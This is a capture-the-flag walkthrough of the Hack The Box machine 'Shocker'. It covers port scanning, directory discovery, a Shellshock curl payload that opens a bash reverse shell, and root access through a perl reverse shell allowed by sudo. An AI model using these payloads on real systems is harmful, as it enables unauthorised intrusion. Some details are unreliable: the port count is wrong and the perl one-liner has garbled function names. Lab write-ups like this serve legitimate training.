Hack the Box - Shocker Walkthrough

Walkthrough of Shocker (10.10.10.56) on Hack the box.

nmap:

nmap -v -p- -sC -sV -oA shocker 10.10.10.56

Lets quickly go over the command:
-v  : verbose - Nmap will print out information to the screen as the scan progresses.

-p- : Scans all 66535 TCP ports

-sC : Performs a script scan using a default set of  scripts from the nmap scripting engine (NSE).

-sV : Performs a version scan of the open ports that nmap discovers.

-oA : Output results of the scan to all formats, this includes normal (.nmap), XML(.xml) and grepable(.gnmap).  Personally, I like using the .xml version with XSLTProc to convert the file into an easily readable html file if there is a large amount of ports showing, however in most cases the normal .nmap file is all you need.  Again I like to name the output file as the name of the machine that I am attacking - in this case shocker.

Finally the ip address to be scanned is added: 10.10.10.56

Open Ports:

Two ports showed as being open, port 22 (SSH) and port 80 (http).  Next step was to manually view the website in Firefox, checking for the usual files such as robots.txt, admin pages and examining the html source code. Nothing obvious came up, so next step was to search for directories.

Directory Discovery:

I started off doing the usual directory scan using the directory-list-2.3-medium.txt file.  This revealed a cgi-bin directory.  Given my previous experience with cgi-bin and its association with shellshock, I needed to find a file to target.  This is where I hit a blank, no matter what directory list/scanner I used I just couldn't find anything.  Eventually I found a hint online that noted that the extensions_common.txt file would be required to find the contents needed.

So with this information in hand, I fired off the following command:
dirb http://10.10.10.56 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt

This combines the big.txt file with the extensions_common.txt file, this will go through each file name in big.txt and append different file extensions to each of these names.  This took sometime, however eventually the results came back as user.sh

Given my previous experiences of finding common gateway interfaces (cgi), I started to suspect that this would result in me gaining remote code execution via the Shellshock vulnerability.

Initial Shell:

Armed with this information I setup a netcat listener on port 1234 nc -lnvp 1234 and then sent the following curl command:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.203/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh

This gave me my initial reverse shell.  Trying to spawn a pty shell failed first time around, this was because the version of python installed on the box was python3, I verified this by using the following which python3.  So, the command is changed to:
python3 -c 'import pty; pty.spawn("/bin/sh")' I then continued to poke around the machine looking for potential areas of weakness.

Priv Esc:

This was one of those cases where I totally over complicated things, sometimes it's not all about exploits.  Simple configuration files and a note left on a box is sometimes all you need.  In this case, I totally forgot to do a simple step: sudo -l.  The -l (list) option will list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host.

Running sudo -l revealed the following:
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
So, we can run perl as root without any password being required.

Root Shell:

A great resource for quick and easy reference is:
https://highon.coffee/blog/reverse-shell-cheat-sheet/

Using the reverse perl shell script, I modified the ip address and port to match my local machine then setup another netcat listener on port 4321 - nc -lnvp 4321 and then ran the following from my limited shell.

perl -e 'use Socket;$i="10.10.14.203";$p=4321;socket(S,PFINET,SOCKSTREAM,getprotobyname("tcp"));if(connect(S,sockaddrin($p,inetaton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

A quick check of id confirmed I was now running as root.

Conclusion:

KISS - Keep it simple stupid!! Sometimes all you need is simple enumeration.